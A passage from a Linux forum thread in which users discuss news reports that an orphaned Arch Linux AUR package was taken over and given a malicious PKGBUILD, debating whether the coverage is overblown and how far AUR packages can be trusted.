Arch Linux AUR Repository Found to Contain Malware
I attempted to post this in the Linux News section but it appears that it was not approved for posting....
"The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories..." https://sensorstechforum.com/arch-li...ntain-malware/ https://www.bleepingcomputer.com/new...ge-repository/ https://betanews.com/2018/07/11/arch-linux-malware/ https://www.linuxuprising.com/2018/0...epository.html |
I'm an Arch user and I have to say that my level of surprise is...none.
|
|
Long time Arch user, and I'm very surprised it didn't make the news on the front page. Seems unless you are subscribed to the AUR specific mail lists you don't need to know.
Bloody strange attitude IMHO. I don't use AUR much, but it looks like damn near everyone uses one of the helper tools. Myself excluded of course. |
this is FUD, or maybe just trying to blow up what is essentially not news at all.
...or, as ChuangTzu quoted correctly: This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories... |
WHY spreadin FUD ? ? ? nonsense !
Code:
ChuangTzu |
what happened is someone took over an orphaned package & made malicious changes to the PKGBUILD. the fact that they could do that is totally normal and does NOT indicate that the AUR itself is compromised or anything. nobody claimed that either, but i'm just making sure that people understand what is happening here.
if you know what the AUR is and how it works, this is really no surprise at all. one is not supposed to trust these packages explicitely. i usually go by votes & popularity & comments. if something is off, people notice very quickly (comments) and take appropriate action (thanks to archlinux' concept of Trusted Users this is possible). Btw, all this was fixed 1-3 days BEFORE these articles even came out. PS: of the four links in post #1 i found this one most informative. it's all there if one cares to read beyond a few buzzwords. PPS: my original assessment that it's the acroread program itself that is the malware, was wrong. once again, read the article. |
https://distrowatch.com/dwres.php?re...ine&story=6389
Quote:
|
All times are GMT -5. The time now is 09:55 PM. |